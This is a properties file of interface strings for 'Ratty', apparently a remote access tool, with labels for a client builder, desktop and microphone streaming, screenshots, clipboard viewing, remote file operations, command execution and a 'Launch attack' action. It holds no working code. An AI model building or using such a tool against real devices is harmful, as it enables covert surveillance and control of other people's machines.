debug.question=Server or client?
debug.server=Server
debug.client=Client

server.port_question=Which port should the server be bind to?
server.port_error=Invalid port.
server.free_warning=The client won't be available until the device restarts.\r\n\
Continue?
server.free_yes=Yes
server.free_no=Cancel

builder.address_question=Which address should the client connect to?
builder.port_question=Which port?
builder.error=Something went wrong.

action.popup=Open popup
action.screenshot=Take screensot
action.desktop=Toggle desktop stream
action.voice=Toggle microphone stream
action.files=Browse files
action.command=Execute command
action.clipboard=Show clipboard
action.website=Open website
action.audio=Play audio
action.free=Free client
action.build=Client builder
action.attack=Launch attack
action.request_files=Request content
action.download=Download file
action.upload=Upload file here
action.execute=Execute file
action.delete=Delete file
action.new_directory=Create new directory

column.name=Name
column.address=IP Address
column.os=OS
column.version=Version
column.desktop=Streaming desktop
column.voice=Streaming voice

cmd.help=HELP: Prints this\r\n\
LIST: Lists all connections\r\n\
EXIT: Well...\r\n\
FREE <CLIENT>: Frees a client\r\n\
POPUP <CLIENT> <STRING>: Shows a popup on the client's device\r\n\
WEBSITE <CLIENT> <STRING>: Opens a website on the client's device\r\n\
\r\n\
<CLIENT>: Either a number (the index) or an IP address\r\n\
<STRING>: A string surrounded by quotation marks
cmd.start=Ratty command line tool\r\n\
Type 'HELP' to get a list of commands
cmd.invalid=Invalid command or parameters
cmd.empty_list=No client connected yet
cmd.connected=Client connected
cmd.disconnected=Client disconnected